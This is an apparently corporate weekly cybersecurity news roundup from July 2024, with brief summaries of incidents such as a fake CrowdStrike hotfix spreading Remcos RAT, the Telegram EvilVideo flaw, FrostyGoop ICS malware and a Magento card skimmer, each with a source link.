Friday, July 26th, 2024
Cybersecurity Week in Review (25/07/24)
Cybercriminals Exploit CrowdStrike Update Mishap to Distribute Remcos RAT Malware
Cybersecurity firm CrowdStrike, which is facing the heat for causing worldwide IT disruptions by pushing out a flawed update to Windows devices, is now warning that threat actors are exploiting the situation to distribute Remcos RAT to its customers in Latin America under the guise of providing a hotfix.
The attack chains involve distributing a ZIP archive file named “crowdstrike-hotfix.zip,” which contains a malware loader named Hijack Loader (aka DOILoader or IDAT Loader) that, in turn, launches the Remcos RAT payload.
Source: https://thehackernews.com/2024/07/cybercriminals-exploit-crowdstrike.html
Verizon to pay $16 million in TracFone data breach settlement
Verizon Communications has agreed to pay a $16,000,000 settlement with the Federal Communications Commission (FCC) in the U.S. concerning three data breach incidents at its wholly owned subsidiary, TracFone Wireless, suffered after its acquisition in 2021.
TracFone is a telecommunications service provider offering services through Total by Verizon Wireless, Straight Talk, and Walmart Family Mobile, among others. Apart from the hefty civil penalty, the announced settlement agreement requires the communications firm to implement specific measures to increase the level of data security for its customers going forward.
Telegram App Flaw Exploited to Spread Malware Hidden in Videos
A zero-day security flaw in Telegram’s mobile app for Android called EvilVideo made it possible for attackers to malicious files disguised as harmless-looking videos.
The exploit appeared for sale for an unknown price in an underground forum on June 6, 2024, ESET said. Following responsible disclosure on June 26, the issue was addressed by Telegram in version 10.14.5 released on July 11.
It’s believed that the payload is concocted using Telegram’s application programming interface (API), which allows for programmatic uploads of multimedia files to chats and channels.
Source: https://thehackernews.com/2024/07/telegram-app-flaw-exploited-to-spread.html
FrostyGoop ICS Malware Left Ukrainian City’s Residents Without Heating
Industrial cybersecurity firm Dragos has shared details on FrostyGoop, a recently discovered piece of malware designed to target industrial control systems (ICS).
FrostyGoop was used in January 2024 in an attack that disrupted systems at a municipal district energy company in the Ukrainian city of Lviv. The targeted facility provides central heating services to 600 apartment buildings in the Lviv metropolitan area, and the attack resulted in loss of heating for residents. The attackers gained access to the targeted energy facility’s systems in April 2023, likely by exploiting an undetermined vulnerability in an internet-exposed Mikrotik router.
Source: https://www.securityweek.com/frostygoop-ics-malware-left-ukrainian-citys-residents-without-heating/
Microsoft Defender Flaw Exploited to Deliver ACR, Lumma, and Meduza Stealers
A now-patched security flaw in the Microsoft Defender SmartScreen has been exploited as part of a new campaign designed to deliver information stealers such as ACR Stealer, Lumma, and Meduza.
Fortinet FortiGuard Labs said it detected the stealer campaign targeting Spain, Thailand, and the U.S. using booby-trapped files that exploit CVE-2024-21412 (CVSS score: 8.1).
The high-severity vulnerability allows an attacker to sidestep SmartScreen protection and drop malicious payloads. Microsoft addressed this issue as part of its monthly security updates released in February 2024.
Source: https://thehackernews.com/2024/07/microsoft-defender-flaw-exploited-to.html
KnowBe4 Hires Fake North Korean IT Worker, Catches New Employee Planting Malware
Florida security awareness training firm KnowBe4 on Tuesday said a North Korean operative posing as a software engineer slipped past its hiring background checks and spent the first 25 minutes on the job attempting to plant malware on a company workstation.
KnowBe4 said its security team detected suspicious activities coming from a newly hired Principal Software Engineer’s workstation and quickly determined the malicious insider was using a Raspberry Pi to download malware, manipulate session history files, and execute unauthorized software.
Greece’s Land Registry agency breached in wave of 400 cyberattacks
The Land Registry agency in Greece has announced that it suffered a limited-scope data breach following a wave of 400 cyberattacks targeting its IT infrastructure over the last week.
The agency said hackers managed to compromise employee terminals and steal 1.2 GB of data, corresponding to roughly 0.0006% of the total data held by the government organization.
The stolen data reportedly does not contain any citizens’ personal information but primarily consists of typical administrative documents, the exposure of which is not expected to impact the registry’s operations.
China-linked Daggerfly hackers update their toolset, likely after exposure
An alleged Chinese government-backed hacking group has made a major update to its toolset and introduced several new versions of its malware, most likely to avoid detection after its older variants were uncovered, according to recent research.
The hackers from the Daggerfly group, also known as Evasive Panda and Bronze Highland, have added to their arsenal a new malware family based on the group’s most popular MgBot malware and a new version of the Macma macOS backdoor.
Source: https://therecord.media/china-linked-daggerfly-revamps-toolset
Magento Sites Targeted with Sneaky Credit Card Skimmer via Swap Files
Threat actors have been observed using swap files in compromised websites to conceal a persistent credit card skimmer and harvest payment information.
The sneaky technique, observed by Sucuri on a Magento e-commerce site’s checkout page, allowed the malware to survive multiple cleanup attempts, the company said.
The skimmer is designed to capture all the data into the credit card form on the website and exfiltrate the details to an attacker-controlled domain named “amazon-analytic[.]com,” which was registered in February 2024.
Source: https://thehackernews.com/2024/07/magento-sites-targeted-with-sneaky.html
Spanish police arrest three suspects linked to pro-Moscow NoName057(16) hackers
Spanish police arrested three suspected members of the pro-Russian hacker group NoName057(16), known for carrying out distributed denial-of-service (DDoS) attacks against Ukraine’s allies.
Spain’s Civil Guard announced on Saturday that they searched the suspects’ apartments in the towns of Manacor, Huelva and Seville, seizing devices and “other evidence.”
The three alleged NoName members are suspected of their involvement in DDoS attacks against public institutions and strategic sectors in Spain and other NATO countries that support Ukraine. The attacks work by flooding targeted websites with junk traffic, making them unreachable.
Source: https://therecord.media/spain-arrest-noname-russia-hackers
Contact Us
The data you supply here will not be added to any mailing list or given to any third party providers without further consent. View our Privacy Policy for more information.